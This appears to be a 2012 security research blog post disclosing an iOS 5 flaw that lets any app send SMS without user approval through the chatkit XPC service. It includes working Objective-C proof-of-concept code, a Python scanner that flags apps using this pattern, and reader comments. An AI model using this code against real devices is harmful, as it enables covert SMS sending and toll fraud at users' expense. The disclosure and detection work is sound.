Wednesday, October 24, 2012

Your Flashlight Can Send SMS — One More Reason to Update up to iOS 6

Today I'm not going to tell you how the security system of iOS 5 is organized. We will not gather bits of information using undocumented features either. We'll just send an SMS from an application behind the user's back.

There is too little information describing low-level operations on iOS, and the bits that exist do not show the picture as a whole. Many header files are closed-source, and most steps are taken blindly. Mac OS X, the ancestor of the mobile platform, becomes the main experimental field.

One of the inter-process communication systems in Mac OS X is XPC. This system layer was developed for inter-process communication based on the transfer of plist structures using libSystem and launchd. In effect, it is an interface for managing processes by exchanging structures such as dictionaries. iOS 5 inherits this mechanism as well.

You may already see where this introduction is heading. Yes, there are system services in iOS that include tools for XPC communication, and I want to demonstrate working with the daemon for SMS sending. Note that the vulnerability is fixed in iOS 6 but is relevant for iOS 5.0–5.1.1. Exploiting it requires no jailbreak, private frameworks, or other illegal tools; only the set of header files from the directory /usr/include/xpc/* is needed.

One of the elements of SMS sending in iOS is the system service com.apple.chatkit, whose tasks include generation, management, and sending of short text messages. For ease of control, it has the publicly available communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can generate and send messages without the user's approval.

Well, let's try to create a connection.

xpc_connection_t myconnection;

dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);

myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);

Now we have the XPC connection myconnection to the SMS sending service. However, XPC creates connections in a suspended state, so we need to take one more step to activate it.

xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event) {
    xpc_type_t xtype = xpc_get_type(event);
    if (XPC_TYPE_ERROR == xtype)
    {
        NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    // Always set an event handler. More on this later.

    NSLog(@"Received a message event!");
});

xpc_connection_resume(myconnection);

The connection is activated. Right at this moment, iOS 6 will write a message to the phone's log saying that this type of communication is forbidden. Now we need to generate a dictionary (an xpc_dictionary) with the data required for sending the message.

// Recipient list, serialized as a binary property list
NSArray *recipients = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];

NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:recipients format:NSPropertyListBinaryFormat_v1_0 options:0 error:NULL];

xpc_object_t mydict = xpc_dictionary_create(0, 0, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");

Little is left to do: send the message to the XPC port and make sure it is delivered.

xpc_connection_send_message(myconnection, mydict);
// The barrier block runs once the messages queued before it have been sent.
xpc_connection_send_barrier(myconnection, ^{
    NSLog(@"Message has been successfully delivered");
});

Sound of SMS sent to a short number.

So before this vulnerability was eliminated in iOS 6, any application could send SMS without the user's approval. Apple has provided iOS 6 with one more security layer, which prevents connections to the service from a sandbox.
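
An app-vetting check for the pattern described in this article, as an added example that is not part of the original post: it scans the strings embedded in an app executable for the chatkit compose port name and for the libxpc call used to reach it. The function name scan_binary, the verdict labels and the sample byte strings are assumptions made for illustration.

```python
import re

# Service name and libxpc symbol taken from the article above.
FLAGGED_SERVICES = {"com.apple.chatkit.clientcomposeserver.xpc"}
MACH_SERVICE_API = b"xpc_connection_create_mach_service"
# Keys the article puts into the XPC message (supporting evidence only).
MESSAGE_KEYS = (b"message-type", b"recipients", b"text")

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")  # printable runs, like strings(1)
SERVICE_NAME = re.compile(rb"com\.apple\.[A-Za-z0-9._-]+")


def scan_binary(blob: bytes) -> dict:
    """Triage an app executable by the strings it embeds (hypothetical helper)."""
    strings = set(PRINTABLE_RUN.findall(blob))
    uses_api = any(MACH_SERVICE_API in s for s in strings)
    services = {m.decode() for s in strings for m in SERVICE_NAME.findall(s)}
    flagged = sorted(services & FLAGGED_SERVICES)
    keys = [k.decode() for k in MESSAGE_KEYS if k in strings]
    if flagged and uses_api:
        verdict = "block"    # names the SMS compose port and imports the call
    elif flagged or (uses_api and services):
        verdict = "review"   # partial match: needs a human look
    else:
        verdict = "pass"
    return {"verdict": verdict, "flagged_services": flagged,
            "uses_mach_service_api": uses_api, "message_keys": keys}


# Constructed byte strings standing in for string tables; not real Mach-O files.
SAMPLE_FLASHLIGHT = (
    b"\x00\x01\x02_xpc_connection_create_mach_service\x00"
    b"com.apple.chatkit.clientcomposeserver.xpc\x00"
    b"message-type\x00recipients\x00text\x00"
)
SAMPLE_CLEAN = b"\x00\x01\x02_AVCaptureDevice\x00setTorchMode:\x00torch.png\x00"
SAMPLE_PARTIAL = b"\x00com.apple.chatkit.clientcomposeserver.xpc\x00about.html\x00"

if __name__ == "__main__":
    for name, blob in [("flashlight", SAMPLE_FLASHLIGHT),
                       ("clean", SAMPLE_CLEAN), ("partial", SAMPLE_PARTIAL)]:
        print(name, scan_binary(blob))
```

String matching is only a first pass: a service name assembled at run time does not appear as a literal, so a "pass" verdict says nothing about such an app.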

Thank you for your attention!

Author: Kirill Ermakov, Positive Research.

9 comments:

  1. Hi this is the first time I have visited this. I want to ask you a question about this blog does what you describe mean that an application can "easily" send sms without the owner's knowledge? Some of my family members have iPhones and not all of them have updated to iOS 6 will applications still be able to send sms even though they still have iOS 5?

    Well that is how I understood your blog but I wanted to make sure?

    Besides my questions I think your blog is great (even though I have only read two of your blogs :P) and you are very good at explaining the problems with text and backing it up with the reasons behind these problems so great job, keep up the good work :)

    Replies
    1. Hi, thanks! This ability works on all iOS 5 devices.
      As I said, it is fixed in iOS 6.

  7. Sending SMS through iphone is a nice idea, but can we send Bulk SMS through it?
